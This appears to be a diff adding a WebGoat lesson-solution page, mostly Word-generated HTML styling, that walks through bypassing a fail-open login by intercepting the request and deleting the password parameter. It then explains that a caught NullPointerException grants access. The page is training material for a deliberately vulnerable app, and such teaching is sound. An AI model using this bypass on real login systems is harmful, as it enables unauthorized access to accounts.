+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Bypass a Fail Open
+Authentication Scheme<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach:</span></b><span
+style='font-family:"Arial","sans-serif"'> Abusing error handling.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson presents
+the basics for understanding the &quot;fail open&quot; condition regarding
+authentication. The security term, “fail open” describes a behavior of a
+verification mechanism. This is when an error (i.e. unexpected exception)
+occurs during a verification method causing that method to evaluate to true.
+This is especially dangerous during login. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to bypass the authentication check.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_3" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image009.jpg" v:shapes="Picture_x0020_3"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 19</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter user
+name webgoat and click “Login”. Intercept the request with WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_7"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image010.jpg" v:shapes="Picture_x0020_7"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercepted request<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click on the
+variable “Password” and click “Delete”. Click “Accept changes”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_8"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image011.jpg" v:shapes="Picture_x0020_8"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Password variable is deleted</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You are now
+“authenticated” as WebGoat.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_4"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image012.jpg" v:shapes="Picture_x0020_4"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 19 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The problem
+is that the exception handler in the Java code is executing a catch block for successful
+authentication. The exception occurs because there is a NullPointer exception
+when reading out the password parameter.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/filelist.xml b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/filelist.xml
new file mode 100644
index 000000000..bdb35f85a
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../FailOpenAuthentication.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
